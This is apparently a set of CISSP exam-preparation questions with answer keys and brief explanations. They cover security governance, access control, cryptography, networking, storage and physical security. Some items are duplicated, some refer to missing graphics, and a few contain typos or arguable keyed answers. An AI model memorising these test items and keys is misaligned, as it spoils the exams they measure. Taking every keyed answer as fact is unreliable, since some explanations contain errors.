C. High availability (HA) is a combination of technologies and processes that work together to ensure that critical functions are always up and running at the necessary level. To provide this level of high availability, a company has to have a long list of technologies and processes that provide redundancy, fault tolerance, and failover capabilities.

Which of the following has an incorrect definition mapping? i.Civil (code) law: Based on previous interpretations of laws ii.Common law: Rule-based law, not precedent-based iii.Customary law: Deals mainly with personal conduct and patterns of behavior iv. Religious law: Based on religious beliefs of the region A. I, iii B. I, ii, iii C. I, ii D. iv

C. I, ii

Because identification is critical to the issue of accountability, companies should follow strict guidelines. Which would not be considered a good practice in implementing identification access control? A. Enforce naming standards. B. IDs should be unique. C. IDs should be job descriptive. D. IDs must be easily validated.

C. IDs should be job descriptive.

A financial institution has developed its internal security program based upon the ISO/IEC 27000 series. The security officer has been told that metrics need to be developed and integrated into this program so that effectiveness can be gauged. Which of the following standards should be followed to provide this type of guidance and functionality? A. ISO/IEC 27002 B. ISO/IEC 27003 C. ISO/IEC 27004 D. ISO/IEC 27005

C. ISO/IEC 27004:2016, which is used to assess the effectiveness of an ISMS and the controls that make up the security program as outlined in ISO/IEC 27001. ISO/IEC 27004 is the guideline for information security management measurement and metrics framework.

John covertly learns the user ID and password of a higher-ranked technician and uses the credentials to access certain areas of a network. What term describes what john has done? A. IP spoofing B. Backdooring C. Masquerading D. Data diddling

C. Masquerading

Bethany is working on a mandatory access control (MAC) system. She has been working on a file that was classified as Secret. She can no longer access this file because it has been reclassified as Top Secret. She deduces that the project she was working on has just increased in confidentiality and she now knows more about this project than her clearance and need-to-know allows. Which of the following refers to a concept that attempts to prevent this type of scenario from occurring? A. Covert storage channel B. Inference attack C. Noninterference D. Aggregation

C. Multilevel security properties can be expressed in many ways, one being noninterference. This concept is implemented to ensure that any actions that take place at a higher security level do not affect or interfere with actions that take place at a lower level. So if an entity at a higher security level performs an action, it cannot change the state for the entity at the lower level. If a lower-level entity were aware of a certain activity that took place by an entity at a higher level and the state of the system changed for this lower-level entity, the entity might be able to deduce too much information about the activities of the higher state, which in turn is a way of leaking information.

Which of the following does not describe proper use of a fire extinguisher? A. Must be in area with electrical equipment. B. Must be visible. C. Must be inspected once a year. D. Must contain fire suppression agent appropriate for area.

C. Must be inspected once a year.

Which is not considered a firewall architecture used to protect networks? A. screened host. B. Screened subnet. C. NAT gateway D. Dual-homed host.

C. NAT gateway

When providing a security report to management, which of the following is the most important component? A. A list of threats, vulnerabilities, and the probabilities that they will occur B. A comprehensive list of the probabilities and impacts of adverse events anticipated C. An executive summary that is comprehensive but does not exceed two pages D. An executive summary that is as long as is necessary to be technically comprehensive and that includes the lists referenced in options A and B

C. No matter how technically comprehensive a report to management must be, the executive summary should never exceed two pages. IT security professionals must understand that the risks posed to an enterprise by data compromise are only one of many concerns that senior management must try to understand and prioritize. C-level executives have to be concerned with a lot of risks, and highly technical threats with which they are not familiar may be difficult for them to sort out appropriately. That means that it is the primary job of the IT security professional to summarize the risks in a way that makes sense to management, and as briefly as possible.

Media sanitization and destruction prevent ___. A. collusion B. Social Engineering. C. Object reuse. D. Replay.

C. Object reuse.

Which of the following means of data removal makes the data unrecoverable even with extraordinary effort, such as with physical forensics in a laboratory? A. deletion of the data. B. Sanitation of the media. C. purging via overwriting D. None of these will work.

C. Purging via overwriting

Sometimes when studying for an industry certification exam like the CISSP, people do not fully appreciate that the concepts and technologies that they need to learn to pass the test directly relate to real-world security issues. To enforce how exam-oriented theoretical concepts directly relate to the practical world of security, choose the correct answer that best describes the Heartbleed SSL/TLS vulnerability, which is considered to be one of the most critical attack vectors in the history of the Internet. A. Digital certificates were stolen through a tunneled attack within the SSL and TLS protocols. B. Certificate authorities were compromised when their SSL and TLS connections were hijacked through the use of TCP hijacking sessions. C. Bounds checking was not implemented, allowing sensitive data to be obtained by attackers from memory segments on web servers. D. Cross-site scripting was allowed to take place on web servers that ran a vulnerable version of Java.

C. OpenSSL implemented an SSL/TLS extension outlined by the IETF in RFP 6520 that allows a connection to remain active between two systems communicating over this security protocol. The way that OpenSSL implemented this extension allows the sending system to request data that it is not authorized to access—such as web server private keys. When an attacker obtains a web server's private key, this circumvents all of the security provided by a public key infrastructure (PKI) environment that the SSL/TLS protocol is based upon. The point is that if you do not really understand how a PKI works and how private and public keys work, the role of digital certificates in security protocols—such as SSL/TLS, bounds checking, and buffer over-reads—you won't understand straightforward vulnerabilities such as Heartbleed. While you will not be asked about a specific vulnerability on the CISSP exam, you will be expected to understand all of the components and technologies involved that allow for this vulnerability to be so dangerous and powerful.

There are several types of password management approaches used by identity management systems. Which of the following reduces help-desk call volume, but is also criticized for the ease with which a hacker could gain access to multiple resources if a password is compromised? A. Management password reset B. Self-service password reset C. Password synchronization D. Assisted password reset

C. Password synchronization is designed to reduce the complexity of keeping up with different passwords for different systems. Password synchronization technology can allow users to maintain a single password across multiple systems by transparently synchronizing the password to other systems and applications. This reduces help-desk call volume. One criticism of this approach is that since only one password is used to access different resources, now the hacker only has to figure out one credential set to gain unauthorized access to all resources.

Which of the following statements correctly describes passwords? A. They are the least expensive and most secure. B. They are the most expensive and least secure. C. They are the least expensive and least secure. D. They are the most expensive and most secure.

C. Passwords provide the least amount of protection, but are the cheapest because they do not require extra readers (as with smart cards and memory cards), do not require devices (as do biometrics), and do not require a lot of overhead in processing (as in cryptography). Passwords are the most common type of authentication method used today.

When a system needs to send data to an end user, that data may have to travel over different networking protocols to get to the destination. The different protocol types depend upon how far geographically the data needs to travel, the types of intermediate devices involved, and how this data needs to be protected during transmission. In the following graphic, which two WAN protocols are missing, and what is the best reasoning for their functionality in the transmission scenario being illustrated? A. PPTP is being used since the traffic needs to travel over different WAN technologies. PPP is being used because the "last leg" of the transmission is over a multiplexed telecommunication link. B L2FP is being used since the traffic needs to travel over different WAN technologies. PPP is being used because the "last leg" of the transmission is over a serial telecommunication link. C. L2TP is being used since the traffic needs to travel over different WAN technologies. PPP is being used because the "last leg" of the transmission is over a serial telecommunication link. D. IPSec tunnel mode is being used since the traffic needs to travel over different WAN technologies. PPP is being used because the "last leg" of the transmission is over a multiplexed telecommunication link.

C. Point-to-Point Protocol (PPP) is a data link protocol that carries out framing and encapsulation for point-to-point connections. Telecommunication devices commonly use PPP as their data link protocol, which encapsulates data to be sent over serial connection links. Layer 2 Tunneling Protocol (L2TP) is used when a PPP connection needs to be extended through a non-IP-based WAN network. L2TP tunnels PPP traffic over various network types such as ATM and Frame Relay. This means that when two networks are connected by WAN links, each network's gateway device (i.e., border router) is configured to use L2TP. When the destination gateway system receives data over the L2TP, it "unwraps" the packets by stripping off the L2TP headers and sends the packets over the next leg of the transmission, which in this graphic is a telecommunication link using PPP.

In a relational database, what field links all the data within a record to a unique value? A cell B. row C. Primary key D. Column key

C. Primary key

Which of the following classifications levels are most commonly used in commercial industry? A. Confidential, Secret, Top Secret. B. Unclassified, sensitive but unclassified. C. Private, Proprietary, Sensitive. D. Unrestricted, for government use only.

C. Private, Proprietary, Sensitive.

Common Criteria uses which of the following to describe specific security solution needs? A.EPL B. EAP C. Protection profiles D. Security Targets.

C. Protection profiles

A party that can prove that damage was caused and that the damage was the company/s fault has proved what? A. Due care B. Legally recognized obligation C. Proximate causation D. Due Diligence.

C. Proximate causation

Which of the following is not a characteristic typically considered important when initially considering security countermeasures? A. Modular in nature. B. includes an audit function. C. Reasonably priced. D. Defaults to least privileged.

C. Reasonably priced.

RAID systems use a number of techniques to provide redundancy and performance. Which of the following activities divides and writes data over several drives? A. Parity B. Mirroring C. Striping D. Hot-swapping

C. Redundant array of inexpensive disks (RAID) is a technology used for redundancy and/or performance improvement. It combines several physical disks and aggregates them into logical arrays. When data is saved, the information is written across all drives. A RAID appears as a single drive to applications and other devices. When striping is used, data is written across all drives. This activity divides and writes the data over several drives. Both write and read performance are increased dramatically because more than one head is reading or writing data at the same time.

In a redundant array of inexpensive disks (RAID) system, data and parity information are striped over several different disks. What is parity information? A. Information used to create new data B. Information used to erase data C. Information used to rebuild data D. Information used to build data

C. Redundant array of inexpensive disks (RAID) provides fault tolerance for hard drives and the data they hold and can improve system performance. Redundancy and speed are provided by breaking up the data and writing it across several disks so that different disk heads can work simultaneously to retrieve the requested information. Control data is also spread across each disk—this is called parity—so that if one disk fails, the other disks can work together and restore its data. If fault tolerance is one of the services a RAID level provides, parity is involved.

There are many different types of access control mechanisms that are commonly embedded into all operating systems. Which of the following is the mechanism that is missing in this graphic? A. Trusted computing base. B. Security perimeter. C. Reference monitor. D. Domain

C. Reference monitor.

What kind of testing is used to determine if program changes have introduced new errors? A. code comparison B. Integration testing. C. Regression testing. D. Unit Testing.

C. Regression testing.

In a monthly staff meeting, Joe is told to "normalize" the accounting database. What does this mean? A. Update the software so it is consistent with all other databases on the network. B. Add conventional formatting standards. C. Remove redundancies and improper relationships D. Add normal "views" for low ranking accountants.

C. Remove redundancies and improper relationships

Dan is a manager of a company that has a huge network enterprise, which holds data in different containers throughout the environment. Dan needs to provide a centralized storage component that provides redundancy. Which of the following technologies should dan implement? A. RAID B. MAID C. SAN D RAIT

C. SAN

What is access control? A. a method of ensuring that a subject (user, program, or process) is the entity it claims to be. B. requiring the subject to provide a second piece to the credential set, as in a password, passphrase, cryptographic key, or token. C. Security features that control how users and systems communicate and interact with other systems and resources. D. controlling how an active object access a passive subject.

C. Security features that control how users and systems communicate and interact with other systems and resources.

What is the imaginary boundary that separates components that maintain security from components that are not security related? A. Reference monitor. B. Security kernel. C. Security perimeter. D. Security policy.

C. Security perimeter.

Who bears ultimate responsibility for the protection of assets within the organization? A. Data owners B. Cyber insurance providers C. Senior management D. Security professionals

C. Senior management

What are the two main security concerns Robbie is most likely being asked to identify and mitigate? A. Social engineering and spear-phishing B. War dialing and pharming C. Spear-phishing and war dialing D. Pharming and spear-phishing

C. Spear-phishing is a targeted social engineering attack, which is what the CIO's secretary is most likely experiencing. War dialing is a brute-force attack against devices that use phone numbers, as in modems. If the modems can be removed, the risk of war-dialing attacks decreases.

What term is used to describe the construction of a transaction used to systematically test the behavior or performance of a critical service which would normally involve human interaction? A. real user monitoring. B. synthetic transactions C. Gray box testing. D. natural transactions.

C. Synthetic Transactions

Once a year, a full evaluation is conducted to evaluate the effectiveness of existing security within a company. Controls are evaluated and a final report is created. Who handles this kind of activity? A. Data owner. B. Systems expert. C. Systems auditor D. Senior management.

C. Systems auditor

Alice is responsible for ensuring that enterprise data is backed up and recoverable. Which of the following is the most critical duty that Alice must perform? A. Backing up user data files on a daily basis. B. Ensuring that the enterprise databases have replicated. C. Testing recovery procedures with data backups. D. Backing up mailbox data to satisfy e-discovery requirements.

C. Testing recovery procedures with data backups.

Alice is responsible for ensuring that enterprise data is backed up and recoverable. Which of the following is the most critical duty that Alice must perform? A. Backing up user data files on a daily basis. B. Ensuring that the enterprise databases have replicated. C. Testing recovery procedures with data backups. D. Backing up mailbox data to satisfy e-discovery requirements.

C. Testing recovery procedures with data backups.

A preferred technique of attackers is to become "normal" privileged users of the systems they compromise as soon as possible. This can typically be accomplished in all the following ways except which one? A. Compromising an existing privileged account B. Creating a new privileged account C. Deleting the /etc/passwd file D. Elevating the privileges of an existing account

C. The /etc/password file contains user account information on Linux systems. Though it might be possible to download its contents and thus attack the passwords of privileged accounts, deleting the file (even if it was possible) would simply deprive the system of the ability to authenticate users.

What is a common problem with vibration-detection devices used for perimeter security? A. They can be defeated by emitting the right electrical signals in the protected area. B. The power source is easily disabled. C. They cause false alarms. D. They interfere with computing devices.

C. This type of system is sensitive to sounds and vibrations and detects the changes in the noise level of an area it is placed within. This level of sensitivity can cause many false alarms. These devices do not emit any waves; they only listen for sounds within an area and are considered passive devices.

Which legal system is characterized by its reliance on previous interpretations of the law? A. Tort B. Customary C. Common D. Civil (code)

C. The common law system is the only one that is based on previous interpretations of the law. This means that the system consists of both laws and court decisions in specific cases. Torts can be (and usually are) part of a common law system, but that would be an incomplete answer to this question.

Information classification is most closely related to which of the following? A. The source of the information B. The information's destination C. The information's value D. The information's age

C. The information's value

How are a one-time pad and a stream cipher similar? A. They are both asymmetric algorithms. B. They are both vulnerable to linear frequency cryptanalysis attacks. C. They are both XOR bits for their encryption process. D. They are both block ciphers.

C. They are both XOR bits for their encryption process.

Which of the following is true about data breaches? A.They are exceptionally rare. B. They always involve personally identifiable information (PII). C. They may trigger legal or regulatory requirements. D. The United States has no laws pertaining to data breaches.

C. They may trigger legal or regulatory requirements.

Which of the following are common military categories of data classification? A. Top secret, Secret, Classified, Unclassified. B. Top Secret, Secret, Confidential, Private. C. Top Secret, Secret, Confidential, Unclassified. D. Classified, Unclassified, Public.

C. Top Secret, Secret, Confidential, Unclassified.

Data leak prevention (DLP) does NOT include which of the following activities? A. Enumeration and classification of assets. B. Understanding normal information flows. C. Tracking inbound connections by source. D. Monitoring for specific data in transit.

C. Tracking inbound connections by source.

What is the difference between least privilege and need to know? A. A user should have least privilege that restricts her need to know. B. A user should have a security clearance to access resources, a need to know about those resources, and least privilege to give her full control of all resources. C. A user should have a need to know to access particular resources, and least privilege should be implemented to ensure she only accesses the resources she has a need to know. D. They are two different terms for the same issue.

C. Users should be able to access only the resources they need to fulfill the duties of their positions. They also should only have the level of permissions and rights for those resources that are required to carry out the exact operations they need for their jobs, and no more. This second concept is more granular than the first, but they have a symbiotic relationship.

As head of sales, Jim is the information owner for the sales department. Which of the following is not Jim's responsibility as information owner? A. Assigning information classifications B. Dictating how data should be protected C. Verifying the availability of data D. Determining how long to retain data

C. Verifying the availability of data

COPPA

Children's Online Privacy Protection Act (1998) requires commercial online content providers (websites) to obtain verifiable parental consent of children under the age of 13 before they can collect, archive, use, or resell any personal information pertaining to that child personally identifiable information is anything that would allow someone to identify or contact the child (i.e. full name, address, e-mail address, telephone number, or Social Security number, and, when combined with an identifier, information collected through cookies such as hobbies, interests, or other data concerning the child and/or the parents) important for librarians to understand these rules so that they can assist children who are asked for parental consent before engaging in certain online activities, and, if necessary, guide them to other sites that do not collect personal information

In your company's first ever security awareness training class, ron asked the question "Why do we have to have security awareness training anyway?" What should the trainer's answer be? A. To comply with stockholders' requirements. B. To improve the company's industry reputation. C. To instill fear and work as a deterrent for the individuals who may attempt malicious activities. D. To improve all employee attitudes and behaviors toward security.

D.

How do you calculate residual risk? A. Threat x risk x asset value. B. (threat x asset value x vulnerability) x risks. C. Sle x frequency =ALE D. (Threats x vulnerability x asset value) x control gap.

D. (Threats x vulnerability x asset value) x control gap.

How do you calculate residual risk? A. Threats × risks × asset value B. (Threats × asset value × vulnerability) × risks C. SLE × frequency = ALE D. (Threats × vulnerability × asset value) × controls gap

D. (Threats × vulnerability × asset value) × controls gap

What is the value of the firewall to the company? A. $62,000 B. $3,000 C. -$62,000 D. -$3,000

D. -$3,000

Rijandael offers multiple key sizes, however it cannot be arbitrary. Which of the following key sizes is not offered with Rjndael? A. 256 B. 128 C. 192. D. 164

D. 164

Many privacy laws dictate which of the following rules? A. Individuals have a right to remove any data they do not want others to know. B. Agencies do not need to ensure that the data is accurate. C. Agencies need to allow all government agencies access to the data. D. Agencies cannot use collected data for a purpose different from what they were collected for.

D. Agencies cannot use collected data for a purpose different from what they were collected for.

Central authenticating systems should perform three primary services. Which service is not one of them? A. Accountability B. Authentication C. Authorization D. Confidentiality.

D. Confidentiality.

Symmetric cryptography has advantages and disadvantages. Which of the following is not considered a disadvantage? A. Key management B. Scalability C. key distribution D. confidentiality

D. Confidentiality.

Camellia has just concluded a security audit of some critical services within her environment and the state of the controls deployed to protect them. She has the results of a battery of technical tests and must now organize them into a written report to her chain of management. In analyzing these results, what must her immediate goal be? A. Forwarding these results to upper management in as much technical detail as possible, as quickly as possible, so that upper management can sort out what to do about them B. Crafting a high-level summary of the results for upper management so that they can decide the relative importance of the results to the business mission C. Exploring countermeasures for every one of the negative findings in order to ascertain the least costly approach to fixing all the problems D. Seeking to understand what the results mean, the relative importance of each result, and what, if anything, can and should be done about each

D. Before Camellia can craft a cogent and actionable report for both management and all the other stakeholders involved, she must first seek to make sense of them herself. After all, she is the subject matter expert in this scenario, and the business must rely on her expertise to understand what the results mean and the relative importance of each of her discoveries within the context of the business's technical operations. While it is management's ultimate responsibility to mitigate critical weaknesses, it is up to her to guide their decisions as to how best to do so.

Internet investigations possess a host of challenges for a data forensic expert. Which of the following would not be associated with internet investigation difficulties? A. lack of skilled investigators. B. rules of evidence C. jurisdiction D. biometric complexities

D. Biometric complexities.

Looking through another person's computer files is an example of what type of attack? A. DOS. B. Hijacking. C. Dictionary. D. Browsing.

D. Browsing.

What is the difference between generating a message authentication code (MAC) and generating a hash MAC (HMAC)? A. There is no difference; they are the same thing. B. They are two different hashing algorithms that are used the same way but produce different message digests (MDs). C. MACs are a result of hashing a message, whereas HMACs are a result of hashing both the message and a public key. D. MACs are a result of hashing a message, whereas HMACs are a result of hashing both the message and a shared secret key.

D. By hashing the message concatenated with a shared secret (symmetric) key, the resulting HMAC can be used to validate not only the integrity of the message, but also that the source possessed the proper key. A MAC can be used to validate the integrity of the message alone.

Which is not true of hierarchical routing? A. The region of a node that shares characteristics and behaviors is called an AS. B. Each AS uses IGP to perform routing functionality. C. EGP is used int areas "between" each AS. D. CAs are specific nodes that are responsible for routing to nodes outside their region.

D. CAs are specific nodes that are responsible for routing to nodes outside their region.

Which of the following will risk analysis not yield? A. monetary values assigned to assets. B. Probability rate of the occurrence of each threat. C. Recommended safeguards, countermeasures, and actions. D. Countermeasures and their costs.

D. Countermeasures and their costs.

Which of the following best describes why Crime Prevention Through Environmental Design (CPTED) would integrate block parties and civic meetings? A. These activities are designed to get people to work together to increase the overall crime and criminal behavior in the area. B. These activities are designed to get corporations to work together to increase the overall awareness of acceptable and unacceptable activities in the area. C. These activities are designed to get people to work together to increase the three strategies of this design model. D. These activities are designed to get people to work together to increase the overall awareness of acceptable and unacceptable activities in the area.

D. CPTED encourages activity support, which is planned activities for the areas to be protected. These activities are designed to get people to work together to increase the overall awareness of acceptable and unacceptable activities in the area. The activities could be neighborhood watch groups, company barbeques, block parties, or civic meetings. This strategy is sometimes the reason for particular placement of basketball courts, soccer fields, or baseball fields in open parks. The increased activity will hopefully keep the bad guys from milling around doing things the community does not welcome.

What is the main drawback of endpoint data leak prevention (EDLP)? A. Inspection. B. Encryption C. Evasion D. Complexity.

D. Complexity.

Which of the following is not considered a secure coding practice? A. Validate user inputs B. Default deny C. Defense in depth D. High (tight) coupling

D. Coupling is not considered a secure coding practice, though it does affect the quality (and hence the security) of software. It is a measurement that indicates how much interaction one module requires to carry out its tasks. High (tight) coupling means a module depends upon many other modules to carry out its tasks. Low coupling is better because the modules are easier to understand and easier to reuse, and changes can take place to one module and not affect many modules around it.

Todd wants to be able to prevent fraud from taking place, but he knows that some people may get around the types of controls he puts into place. In those situations he wants to be able to identify when an employee is doing something suspicious. Which of the following incorrectly describes what Todd is implementing in this scenario and what those specific controls provide? A. Separation of duties by ensuring that a supervisor must approve the cashing of a check over $3,500. This is an administrative control that provides preventive protection for Todd's organization. B. Rotation of duties by ensuring that one employee only stays in one position for up to three months at a time. This is an administrative control that provides detective capabilities. C. Security awareness training, which is a preventive administrative control that can also emphasize enforcement. D. Dual control, which is an administrative detective control that can ensure that two employees must carry out a task simultaneously.

D. Dual control, which is an administrative detective control that can ensure that two employees must carry out a task simultaneously.

Risk assessment is not always met with open arms by management for all of the following reasons except: A. Ignorance. B. Over-Confidence C. Fear. D. Due care and Due Diligence

D. Due Care and Due Diligence.

What is the difference between due care and due diligence? A. Due care is the continual effort to ensure that the right thing takes place, and due diligence is the continual effort to stay compliant with regulations. B. Due care is based on the prudent person concept, whereas due diligence is not. C. They mean the same thing. D. Due diligence involves investigating the risks, whereas due care involves carrying out the necessary steps to mitigate these risks.

D. Due care and due diligence are legal terms that do not just pertain to security. Due diligence involves going through the necessary steps to know what a company's or individual's actual risks are, whereas due care involves carrying out responsible actions to reduce those risks. These concepts correspond with the "prudent person" concept.

What is the difference between due care and due diligence? A. Due care is the continual effort of ensuring that the right thing takes place, and due diligence is the continual effort to stay compliant to regulations. B. Due care and due diligence are in contrast to the " prudent man" concept. C. They mean the same thing. D. Due diligence is investigating the risks, and due care is carrying out the necessary steps to mitigate these risks.

D. Due diligence is investigating the risks, and due care is carrying out the necessary steps to mitigate these risks.

Which of the following solutions is best to meet the company's need to protect wireless traffic? A. EAP-TLS B. EAP-PEAP C. LEAP D. EAP-TTLS

D. EAP-Tunneled Transport Layer Security (EAP-TTLS) is an EAP protocol that extends TLS. EAP-TTLS is designed to provide authentication that is as strong as EAP-TLS, but it does not require that each wireless device be issued a certificate. Instead, only the authentication servers are issued certificates. User authentication is performed by password, but the password credentials are transported in a securely encrypted tunnel established based upon the server certificates.

Several models and frameworks have been developed by different organizations over the years to help businesses carry out processes in a more efficient and effective manner. Which of the following provides the correct definition mapping of one of these items? i.COSO A framework and methodology for enterprise security architecture and service management ii.ITIL Processes to allow for IT service management developed by the United Kingdom's Office of Government Commerce iii. Six Sigma Business management strategy that can be used to carry out process improvement iv. See the answer Organizational development for process improvement developed by Carnegie Mellon A. i B. i, iii C. ii, iv D. ii, iii, iv

D. Each of the listed answers in ii, iii, and iv has the correct definition mapping. Answer i is incorrect. COSO is an organization that provides leadership in the areas of organizational governance, internal control, enterprise risk management, fraud, business ethics, and financial reporting. The incorrect description for COSO in answer i maps to SABSA.

There are several different types of important architectures within backup technologies. Which architecture does the graphic that follows represent? A.Clustering B. Grid computing C. Backup tier security D. Hierarchical storage management

D. Hierarchical storage management (HSM) provides continuous online backup functionality. It combines hard disk technology with the cheaper and slower optical or tape jukeboxes. The HSM system dynamically manages the storage and recovery of files, which are copied to storage media devices that vary in speed and cost. The faster media hold the data that is accessed more often, and the seldom-used files are stored on the slower devices, or near-line devices.

High availability (HA) is a combination of technologies and processes that work together to ensure that specific critical functions are always up and running at the necessary level. To provide this level of high availability, a company has to have a long list of technologies and processes that provide redundancy, fault tolerance, and failover capabilities. Which of the following best describes these characteristics? A. Redundancy is the duplication of noncritical components or functions of a system with the intention of decreasing reliability of the system. Fault tolerance is the capability of a technology to discontinue to operate as expected even if something unexpected takes place. If a technology has a failover capability, this means that if there is a failure that cannot be handled through normal means, then processing is "switched over" to a working system. B. Redundancy is the duplication of critical components or functions of a system with the intention of increasing reliability of the system. Fault tolerance is the capability of a technology to discontinue to operate as expected even if something unexpected takes place. If a technology has a failover capability, this means that if there is a failure that cannot be handled through normal means, then processing is "switched over" to a working system. C. Redundancy is the duplication of critical components or functions of a system with the intention of increasing reliability of the system. Fault tolerance is the capability of a technology to continue to operate as expected even if something unexpected takes place. If a technology has a failover capability, this means that if there is a failure that cannot be handled through normal means, then processing is "switched over" to a nonworking system. D. Redundancy is the duplication of critical components or functions of a system with the intention of increasing reliability of the system. Fault tolerance is the capability of a technology to continue to operate as expected even if something unexpected takes place. If a technology has a failover capability, this means that if there is a failure that cannot be handled through normal means, then processing is "switched over" to a working system.

D. High availability (HA) is a combination of technologies and processes that work together to ensure that specific critical functions are always up and running. The specific thing can be a database, a network, an application, a power supply, etc. To provide this level of high availability, the company has to have a long list of technologies and processes that provide redundancy, fault tolerance, and failover capabilities. Redundancy, fault tolerance, and failover capabilities increase the reliability of a system or network. High reliability allows for high availability.

Who is ultimately responsible for making sure data is classified and protected? A. data owners B. users C. administrators D. management.

D. Management.

When can executives be charged with negligence? A. If they follow the transborder laws B. If they do not properly report and prosecute attackers C. If they properly inform users that they may be monitored D. If they do not practice due care when protecting resources

D. If they do not practice due care when protecting resources

John is a new CSO and he has been told that there have been three assaults in the company's parking garage. Which of the following would not be a good countermeasure for John to implement? A. Stair towers and elevators within the garage has glass windows instead of metal walls. B. Pedestrian walkways would be created such that people could look out across the rows of cars. C. Different rows for cars to park in would be separated by low walls and structural pillars, instead of solid walls. D. Implementation of concrete walls between the elevator and the cars.

D. Implementation of concrete walls between the elevator and the cars.

Which of the following are rows and columns within relational databases? A. Rows and tuples B. Attributes and rows C. Keys and views D. Tuples and attributes

D. In a relational database, a row is referred to as a tuple, whereas a column is referred to as an attribute.

Khadijah is leading a software development team for her company. She knows the importance of conducting an attack surface analysis and developing a threat model. During which phase of the software development life cycle should she perform these actions? A. Requirements gathering B. Testing and validation C. Release and maintenance D. Design

D. In the system design phase we gather system requirement specifications and determine how the system will accomplish design goals, such as required functionality, compatibility, fault tolerance, extensibility, security, usability, and maintainability. The attack surface analysis, together with the threat model, inform the developers' decisions because they can look at proposed architectures and competing designs from the perspective of an attacker. This allows them to develop a more defensible system. Though it is possible to start the threat model during the earlier phase of requirements gathering, this modeling effort is normally not done that early. Furthermore, the attack surface cannot be properly studied until there is a proposed architecture to analyze. Performing this activity later in the SDLC is less effective and usually results in security being "bolted-on" instead of "baked-in."

What is the term used to describe the systematic evaluation of the exchange points between a graphical data system and the system's user? A. Black Box Testing B. Administrative Testing. C. Stress Testing. D. Interface Testing.

D. Interface Testing.

The algorithm that was accepted as the Data Encryption Standard (DES) was? A. El Gamal B. IDEA. C. RC5. D. Lucifer.

D. Lucifer.

Which of the following describes the best use of Network Access Control (NAC)? A. The use of IEEE 802.1X Extensible Authentication Protocol (EAP) to authenticate endpoints prior to allowing them to join a network B. The combined use of a public key infrastructure (PKI) and a hardware Trusted Platform Module (TPM) to conduct certificate-based endpoint authentication and establish a secure link through symmetric key exchange C. The combination of EAP for endpoint authentication and multifactor user authentication for highly granular control D. The use of EAP both for endpoint authentication and for inspection of endpoint OS patch levels and antimalware updates, with the goal of placing untrusted systems into a quarantined VLAN segment

D. NAC can and should use some form of EAP for endpoint authentication, but the common best use of it is to enable an authenticated system to be inspected as to its security posture. If the system is behind in its patch level or antimalware updates, or is generally misconfigured, it should be placed into a VLAN that gives it access only to the systems providing the necessary updates and configuration management. Once the system meets policy requirements, it can then be reassigned to the appropriate protected LAN segment.

Why is a truly quantitative risk analysis not possible to achieve? A.It is possible, which is why it is used. B. It assigns severity levels. Thus, it is hard to translate into monetary values. C. It is dealing with purely quantitative elements. D. Quantitative measures must be applied to qualitative elements.

D. Quantitative measures must be applied to qualitative elements.

Which of the following sections of a technical security report is the most critical to include? A. The threats and vulnerabilities. B. The probability of exploitation. C. The impact of exploitation. D. Recommended actions.

D. Recommended actions.

Which of the following sections of a technical security report is the most critical to include? A. The threats and vulnerabilities. B. The probability and exploitation. C. The impact of exploitation D. Recommended actions.

D. Recommended actions.

A software development company released a product that committed several errors that were not expected once deployed in their customers' environments. All of the software code went through a long list of tests before being released. The team manager found out that after a small change was made to the code, the program was not tested before it was released. Which of the following tests was most likely not conducted? A. Unit B. Compiled C. ntegration D. Regression

D. Regression testing should take place after a change to a system takes place, retesting to ensure functionality, performance, and protection.

A number of measures should be taken to help protect devices and the environment from electric power issues. Which of the following is best to keep voltage steady and power clean? A. power line monitor. B. Surge protector. C. Shielded cabling. D. Regulator

D. Regulator

When determining what biometric access control system to buy, which factor should be given the least amount of weight? A. User acceptance. B. accuracy of the control. C. Processing speed of the control D. Reporting capabilities

D. Reporting capabilities

Which of the following refers to the data left on the media after the media has been erased? A.Semi-hidden. B. Dregs. C. Sticky bits. D. Residual

D. Residual

Jake is an IT administrator who is concerned about the vulnerabilities that exist with instant messaging around the office. He knows that it is very popular through the company, especially with upper management, so he must tread lightly when tightening security. Which of the following actions should jake avoid? A. install firewalls on desktops. B. Verify central firewall is blocking unapproved messaging. C. propose an IM Security policy D. Restrict all confidential data from being sent over Im.

D. Restrict all confidential data from being sent over Im.

Data at rest is commonly A. Using a RESTful protocol for transmission B. Stored in registers C. Being transmitted across the network D. Stored in external storage devices

D. Stored in external storage devices

Which of the following INCORRECTLY describes IP spoofing and session hijacking? A. Address spoofing helps an attacker to hijack sessions between two users without being noticed. B. IP spoofing makes it harder to track down an attacker. C. Session hijacking can be prevented with mutual authentication. D. IP spoofing is used to hijack SSL and IPSec secure communications.

D. Secure Sockets Layer (SSL) and IPSec can protect the integrity, authenticity, and confidentiality of network traffic. Even if an attacker spoofed an IP address, he would not be able to successfully manipulate or read SSL- or IPSec-encrypted traffic, as he would not have access to the keys and other cryptographic material required.

SSL is a protocol used for securing transactions that occur over untrusted networks. Which of the following best describes what takes place during a SSL connection setup process? A.The server creates a session key and encrypts it with a public key. B.The server creates a session key and encrypts it with a private key. C.The client creates a session key and encrypts it with a private key. D. The client creates a session key and encrypts it with a public key.

D. Secure Sockets Layer (SSL) uses public key encryption and provides data encryption, server authentication, message integrity, and optional client authentication. When a client accesses a website, that website may have both secured and public portions. The secured portion would require the user to be authenticated in some fashion. When the client goes from a public page on the website to a secured page, the web server will start the necessary tasks to invoke SSL and protect this type of communication. The server sends a message back to the client, indicating a secure session should be established, and the client in response sends its security parameters. The server compares those security parameters to its own until it finds a match. This is the handshaking phase. The server authenticates to the client by sending it a digital certificate, and if the client decides to trust the server, the process continues. The client generates a session key and encrypts it with the server's public key. This encrypted key is sent to the web server, and they both use this symmetric key to encrypt the data they send back and forth.

Who does the security auditor report to? A. Data owners B. Data Custodians C. External Audit Organization D. Senior management.

D. Senior management.

The unauthorized disclosure of information defined a secret would by definition result in which of the following levels of damage? A. Grave damage to national security. B. Damage to national security. C. Extreme damage to national security. D. Serious damage to national security.

D. Serious damage to national security.

Alice has inadvertently disclosed classified information regarding a government project that was supposed to remain secret, and only accessible to cleared persons. What level of damage to national security has been risked by her actions? A. grave. B. irreparable. C. minor D. Serious.

D. Serious.

Which of the following would be the best solution to integrate to meet the authentication requirements outlined in the scenario? A. TLS B. IPSec C. 802.1x D. SASL

D. Simple Authentication and Security Layer (SASL) is a protocol-independent authentication framework. It is a framework for authentication and data security in Internet protocols. It decouples authentication mechanisms from application protocols, with the goal of allowing any authentication mechanism supported by SASL to be used in any application protocol that uses SASL. SASL's design is intended to allow new protocols to reuse existing mechanisms without requiring redesign of the mechanisms, and allows existing protocols to make use of new mechanisms without redesign of protocols.

